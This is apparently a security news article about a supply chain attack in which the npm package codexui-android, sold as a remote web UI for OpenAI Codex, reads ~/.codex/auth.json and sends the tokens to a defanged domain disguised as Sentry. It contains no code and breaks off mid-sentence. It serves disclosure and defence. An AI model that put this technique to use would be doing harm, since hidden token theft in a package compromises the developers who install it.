OpenAI Codex Authentication Tokens Stolen in codexui-android npm Supply Chain Attack
OpenAI Codex Authentication Tokens Stolen in codexui-android npm Supply Chain Attack
https://thehackernews.com/2026/06/openai-codex-authentication-tokens.html
Publish Date: 2026-06-01 05:31:00
Source Domain: thehackernews.com
Cybersecurity researchers have disclosed details of a new malicious supply chain campaign that’s targeting developers using OpenAI Codex through a legitimate-looking remote web UI.
The tool, named codexui-android, is advertised on GitHub and npm as a remote web UI for OpenAI Codex, attracting over 29,000 weekly downloads. The package is still available for download from the repository.
What makes this activity noteworthy is that it’s not a traditional attack that uses a typosquat or throwaway package to trick developers. Rather, the malicious code is embedded into a functional npm package that has undergone active development. The associated GitHub repository remains clean.
“And for the past month, every single invocation has been quietly exfiltrating your Codex authentication tokens to an attacker-controlled server,” Aikido Security researcher Charlie Eriksen said.
The nefarious changes are said to have been introduced about a month after the package was published to the registry, likely in an effort to build user trust and expand its reach. The npm account associated with the package is “friuns” (aka Igor Levochkin).
Present within the package is code that extracts the contents of Codex’s “~/.codex/auth.json” file and exfiltrates them to a remote server (“sentry.anyclaw[.]store”) that masquerades as Sentry, a legitimate application monitoring and error tracking platform. The captured data includes the following details: access_token, refresh_token, id_token, and account ID.
“The refresh_token doesn’t expire,” Eriksen said. “An attacker holding it can silently impersonate you indefinitely. A stolen Codex refresh_token goes beyond access to a chat interface — it’s persistent, silent access to whatever that account can do.”
It’s worth mentioning here that every time a user logs in to the Codex app, CLI, or IDE Extension using either ChatGPT or an API key, the login details are cached locally in a plaintext file at ~/.codex/auth.json or in the operating…
